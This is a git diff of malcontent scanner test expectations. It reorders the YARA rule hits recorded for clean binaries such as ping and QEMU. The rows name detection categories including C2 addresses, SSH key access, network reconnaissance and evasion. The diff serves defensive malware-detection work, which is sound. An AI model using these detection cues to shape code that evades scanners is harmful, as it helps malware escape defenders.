[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | | LOW | [net/http/proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[HttpURLConnection](https://github.com/search?q=HttpURLConnection&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HttpURLConnection](https://github.com/search?q=HttpURLConnection&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code)
[HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-resolve.yara#gethostbyaddr) | [resolves network hosts via IP address](https://linux.die.net/man/3/gethostbyaddr) | [gethostbyaddr](https://github.com/search?q=gethostbyaddr&type=code) | | LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | @@ -166,7 +166,7 @@ | LOW | [process/alarm](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/alarm.yara#alarm) | [set an alarm clock for delivery of a signal](https://man7.org/linux/man-pages/man2/alarm.2.html) | [alarm](https://github.com/search?q=alarm&type=code) | | LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd](https://github.com/search?q=cd&type=code) | | LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | -| LOW | [process/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/create.yara#CreateProcess) | create a new process | [CreateProcess1_closur](https://github.com/search?q=CreateProcess1_closur&type=code)
[CreateProcess1_info](https://github.com/search?q=CreateProcess1_info&type=code)
[CreateProcess2_bytes](https://github.com/search?q=CreateProcess2_bytes&type=code)
[CreateProcess2_closur](https://github.com/search?q=CreateProcess2_closur&type=code)
[CreateProcess2_info](https://github.com/search?q=CreateProcess2_info&type=code)
[CreateProcess3_bytes](https://github.com/search?q=CreateProcess3_bytes&type=code)
[CreateProcess3_closur](https://github.com/search?q=CreateProcess3_closur&type=code)
[CreateProcess3_info](https://github.com/search?q=CreateProcess3_info&type=code)
[CreateProcess4_closur](https://github.com/search?q=CreateProcess4_closur&type=code)
[CreateProcess4_info](https://github.com/search?q=CreateProcess4_info&type=code)
[CreateProcess5_closur](https://github.com/search?q=CreateProcess5_closur&type=code)
[CreateProcess6_bytes](https://github.com/search?q=CreateProcess6_bytes&type=code)
[CreateProcessWithExit](https://github.com/search?q=CreateProcessWithExit&type=code)
[CreateProcessZCchildz](https://github.com/search?q=CreateProcessZCchildz&type=code)
[CreateProcessZCclosez](https://github.com/search?q=CreateProcessZCclosez&type=code)
[CreateProcessZCcmdspe](https://github.com/search?q=CreateProcessZCcmdspe&type=code)
[CreateProcessZCcreate](https://github.com/search?q=CreateProcessZCcreate&type=code)
[CreateProcessZCcwd_cl](https://github.com/search?q=CreateProcessZCcwd_cl&type=code)
[CreateProcessZCcwd_in](https://github.com/search?q=CreateProcessZCcwd_in&type=code)
[CreateProcessZCdelega](https://github.com/search?q=CreateProcessZCdelega&type=code)
[CreateProcessZCdetach](https://github.com/search?q=CreateProcessZCdetach&type=code)
[CreateProcessZCenv_cl](https://github.com/search?q=CreateProcessZCenv_cl&type=code)
[CreateProcessZCenv_in](https://github.com/search?q=CreateProcessZCenv_in&type=code)
[CreateProcessZCnewzus](https://github.com/search?q=CreateProcessZCnewzus&type=code)
[CreateProcessZCstdzue](https://github.com/search?q=CreateProcessZCstdzue&type=code)
[CreateProcessZCstdzui](https://github.com/search?q=CreateProcessZCstdzui&type=code)
[CreateProcessZCstdzuo](https://github.com/search?q=CreateProcessZCstdzuo&type=code)
[CreateProcessZCusezup](https://github.com/search?q=CreateProcessZCusezup&type=code)
[CreateProcess_closure](https://github.com/search?q=CreateProcess_closure&type=code)
[CreateProcess_con_inf](https://github.com/search?q=CreateProcess_con_inf&type=code)
[CreateProcess_info](https://github.com/search?q=CreateProcess_info&type=code)
[CreateProcess_slow](https://github.com/search?q=CreateProcess_slow&type=code)
[CreateProcesszugo1_cl](https://github.com/search?q=CreateProcesszugo1_cl&type=code)
[CreateProcesszugo1_in](https://github.com/search?q=CreateProcesszugo1_in&type=code)
[CreateProcesszuzdcsho](https://github.com/search?q=CreateProcesszuzdcsho&type=code)
[CreateProcesszuzdczez](https://github.com/search?q=CreateProcesszuzdczez&type=code)
[CreateProcesszuzdczsz](https://github.com/search?q=CreateProcesszuzdczsz&type=code) | +| LOW | [process/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/create.yara#CreateProcess) | create a new process | [CreateProcess1_closur](https://github.com/search?q=CreateProcess1_closur&type=code)
[CreateProcess2_closur](https://github.com/search?q=CreateProcess2_closur&type=code)
[CreateProcess3_closur](https://github.com/search?q=CreateProcess3_closur&type=code)
[CreateProcess4_closur](https://github.com/search?q=CreateProcess4_closur&type=code)
[CreateProcess5_closur](https://github.com/search?q=CreateProcess5_closur&type=code)
[CreateProcessWithExit](https://github.com/search?q=CreateProcessWithExit&type=code)
[CreateProcessZCchildz](https://github.com/search?q=CreateProcessZCchildz&type=code)
[CreateProcessZCclosez](https://github.com/search?q=CreateProcessZCclosez&type=code)
[CreateProcessZCcmdspe](https://github.com/search?q=CreateProcessZCcmdspe&type=code)
[CreateProcessZCcreate](https://github.com/search?q=CreateProcessZCcreate&type=code)
[CreateProcessZCcwd_cl](https://github.com/search?q=CreateProcessZCcwd_cl&type=code)
[CreateProcessZCcwd_in](https://github.com/search?q=CreateProcessZCcwd_in&type=code)
[CreateProcessZCdelega](https://github.com/search?q=CreateProcessZCdelega&type=code)
[CreateProcessZCdetach](https://github.com/search?q=CreateProcessZCdetach&type=code)
[CreateProcessZCenv_cl](https://github.com/search?q=CreateProcessZCenv_cl&type=code)
[CreateProcessZCenv_in](https://github.com/search?q=CreateProcessZCenv_in&type=code)
[CreateProcessZCnewzus](https://github.com/search?q=CreateProcessZCnewzus&type=code)
[CreateProcessZCstdzue](https://github.com/search?q=CreateProcessZCstdzue&type=code)
[CreateProcessZCstdzui](https://github.com/search?q=CreateProcessZCstdzui&type=code)
[CreateProcessZCstdzuo](https://github.com/search?q=CreateProcessZCstdzuo&type=code)
[CreateProcessZCusezup](https://github.com/search?q=CreateProcessZCusezup&type=code)
[CreateProcess_closure](https://github.com/search?q=CreateProcess_closure&type=code)
[CreateProcess_con_inf](https://github.com/search?q=CreateProcess_con_inf&type=code)
[CreateProcesszugo1_cl](https://github.com/search?q=CreateProcesszugo1_cl&type=code)
[CreateProcesszugo1_in](https://github.com/search?q=CreateProcesszugo1_in&type=code)
[CreateProcesszuzdcsho](https://github.com/search?q=CreateProcesszuzdcsho&type=code)
[CreateProcesszuzdczez](https://github.com/search?q=CreateProcesszuzdczez&type=code)
[CreateProcesszuzdczsz](https://github.com/search?q=CreateProcesszuzdczsz&type=code)
[CreateProcess2_bytes](https://github.com/search?q=CreateProcess2_bytes&type=code)
[CreateProcess3_bytes](https://github.com/search?q=CreateProcess3_bytes&type=code)
[CreateProcess6_bytes](https://github.com/search?q=CreateProcess6_bytes&type=code)
[CreateProcess1_info](https://github.com/search?q=CreateProcess1_info&type=code)
[CreateProcess2_info](https://github.com/search?q=CreateProcess2_info&type=code)
[CreateProcess3_info](https://github.com/search?q=CreateProcess3_info&type=code)
[CreateProcess4_info](https://github.com/search?q=CreateProcess4_info&type=code)
[CreateProcess_info](https://github.com/search?q=CreateProcess_info&type=code)
[CreateProcess_slow](https://github.com/search?q=CreateProcess_slow&type=code) | | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 1979df9dc..dca4809e8 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -2,14 +2,14 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | -| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code) | +| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code)
[id](https://github.com/search?q=id&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics --](https://github.com/search?q=ping+statistics+--&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping statistics --](https://github.com/search?q=ping+statistics+--&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code)
[raw socket](https://github.com/search?q=raw+socket&type=code) | +| MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [raw socket](https://github.com/search?q=raw+socket&type=code)
[SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code) | | LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index c5d2a7b16..79e916427 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -2,61 +2,61 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--|--|--|--| -| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | $elf_head | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | +| MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [register_port](https://github.com/search?q=register_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | -| MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [BlockdevQcow2EncryptionFormat_lookup](https://github.com/search?q=BlockdevQcow2EncryptionFormat_lookup&type=code)
[BlockdevQcowEncryptionFormat_lookup](https://github.com/search?q=BlockdevQcowEncryptionFormat_lookup&type=code)
[Encrypt the image with](https://github.com/search?q=Encrypt+the+image+with&type=code)
[Encryption header offse](https://github.com/search?q=Encryption+header+offse&type=code)
[RbdImageEncryptionFormat_lookup](https://github.com/search?q=RbdImageEncryptionFormat_lookup&type=code)
[bj_BlockdevQcow2Encryption_base_members](https://github.com/search?q=bj_BlockdevQcow2Encryption_base_members&type=code)
[ee_BlockdevQcow2Encryption](https://github.com/search?q=ee_BlockdevQcow2Encryption&type=code)
[it_type_RbdImageEncryptionFormat](https://github.com/search?q=it_type_RbdImageEncryptionFormat&type=code)
[nfoSpecificQCow2EncryptionBase_members](https://github.com/search?q=nfoSpecificQCow2EncryptionBase_members&type=code)
[nfoSpecificQCow2Encryption_members](https://github.com/search?q=nfoSpecificQCow2Encryption_members&type=code)
[obj_BlockdevQcowEncryption_base_members](https://github.com/search?q=obj_BlockdevQcowEncryption_base_members&type=code)
[pe_BlockdevQcow2EncryptionFormat](https://github.com/search?q=pe_BlockdevQcow2EncryptionFormat&type=code)
[pe_BlockdevQcow2Encryption_members](https://github.com/search?q=pe_BlockdevQcow2Encryption_members&type=code)
[qapi_free_RbdEncryptionCreateOptions](https://github.com/search?q=qapi_free_RbdEncryptionCreateOptions&type=code)
[qapi_free_RbdEncryptionOptionsLUKS2](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKS2&type=code)
[qapi_free_RbdEncryptionOptionsLUKSAn](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKSAn&type=code)
[qapi_free_RbdEncryptionOptionsLUKSBa](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKSBa&type=code)
[ree_BlockdevQcowEncryption](https://github.com/search?q=ree_BlockdevQcowEncryption&type=code)
[t_type_q_obj_RbdEncryptionCreateOptions](https://github.com/search?q=t_type_q_obj_RbdEncryptionCreateOptions&type=code)
[t_type_q_obj_RbdEncryptionOptions_base_](https://github.com/search?q=t_type_q_obj_RbdEncryptionOptions_base_&type=code)
[visit_type_RbdEncryptionCreateOptions](https://github.com/search?q=visit_type_RbdEncryptionCreateOptions&type=code)
[visit_type_RbdEncryptionOptionsLUKS2_](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKS2_&type=code)
[visit_type_RbdEncryptionOptionsLUKSAn](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKSAn&type=code)
[visit_type_RbdEncryptionOptionsLUKSBa](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKSBa&type=code)
[visit_type_RbdEncryptionOptionsLUKS_m](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKS_m&type=code)
[visit_type_RbdEncryptionOptions_membe](https://github.com/search?q=visit_type_RbdEncryptionOptions_membe&type=code)
[ype_BlockdevQcowEncryptionFormat](https://github.com/search?q=ype_BlockdevQcowEncryptionFormat&type=code)
[ype_BlockdevQcowEncryption_members](https://github.com/search?q=ype_BlockdevQcowEncryption_members&type=code) | +| MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [bj_BlockdevQcow2Encryption_base_members](https://github.com/search?q=bj_BlockdevQcow2Encryption_base_members&type=code)
[obj_BlockdevQcowEncryption_base_members](https://github.com/search?q=obj_BlockdevQcowEncryption_base_members&type=code)
[t_type_q_obj_RbdEncryptionCreateOptions](https://github.com/search?q=t_type_q_obj_RbdEncryptionCreateOptions&type=code)
[t_type_q_obj_RbdEncryptionOptions_base_](https://github.com/search?q=t_type_q_obj_RbdEncryptionOptions_base_&type=code)
[nfoSpecificQCow2EncryptionBase_members](https://github.com/search?q=nfoSpecificQCow2EncryptionBase_members&type=code)
[visit_type_RbdEncryptionCreateOptions](https://github.com/search?q=visit_type_RbdEncryptionCreateOptions&type=code)
[visit_type_RbdEncryptionOptionsLUKS2_](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKS2_&type=code)
[visit_type_RbdEncryptionOptionsLUKSAn](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKSAn&type=code)
[visit_type_RbdEncryptionOptionsLUKSBa](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKSBa&type=code)
[visit_type_RbdEncryptionOptionsLUKS_m](https://github.com/search?q=visit_type_RbdEncryptionOptionsLUKS_m&type=code)
[visit_type_RbdEncryptionOptions_membe](https://github.com/search?q=visit_type_RbdEncryptionOptions_membe&type=code)
[BlockdevQcow2EncryptionFormat_lookup](https://github.com/search?q=BlockdevQcow2EncryptionFormat_lookup&type=code)
[qapi_free_RbdEncryptionCreateOptions](https://github.com/search?q=qapi_free_RbdEncryptionCreateOptions&type=code)
[qapi_free_RbdEncryptionOptionsLUKSAn](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKSAn&type=code)
[qapi_free_RbdEncryptionOptionsLUKSBa](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKSBa&type=code)
[BlockdevQcowEncryptionFormat_lookup](https://github.com/search?q=BlockdevQcowEncryptionFormat_lookup&type=code)
[qapi_free_RbdEncryptionOptionsLUKS2](https://github.com/search?q=qapi_free_RbdEncryptionOptionsLUKS2&type=code)
[nfoSpecificQCow2Encryption_members](https://github.com/search?q=nfoSpecificQCow2Encryption_members&type=code)
[pe_BlockdevQcow2Encryption_members](https://github.com/search?q=pe_BlockdevQcow2Encryption_members&type=code)
[ype_BlockdevQcowEncryption_members](https://github.com/search?q=ype_BlockdevQcowEncryption_members&type=code)
[it_type_RbdImageEncryptionFormat](https://github.com/search?q=it_type_RbdImageEncryptionFormat&type=code)
[pe_BlockdevQcow2EncryptionFormat](https://github.com/search?q=pe_BlockdevQcow2EncryptionFormat&type=code)
[ype_BlockdevQcowEncryptionFormat](https://github.com/search?q=ype_BlockdevQcowEncryptionFormat&type=code)
[RbdImageEncryptionFormat_lookup](https://github.com/search?q=RbdImageEncryptionFormat_lookup&type=code)
[ee_BlockdevQcow2Encryption](https://github.com/search?q=ee_BlockdevQcow2Encryption&type=code)
[ree_BlockdevQcowEncryption](https://github.com/search?q=ree_BlockdevQcowEncryption&type=code)
[Encryption header offse](https://github.com/search?q=Encryption+header+offse&type=code)
[Encrypt the image with](https://github.com/search?q=Encrypt+the+image+with&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [base64_encode](https://github.com/search?q=base64_encode&type=code) | +| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [py_base64_decode::base64_decode](https://github.com/search?q=py_base64_decode%3A%3Abase64_decode&type=code) | +| MEDIUM | [data/base64/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-encode.yara#py_base64_encode) | encode base64 strings | [py_base64_encode::base64_encode](https://github.com/search?q=py_base64_encode%3A%3Abase64_encode&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
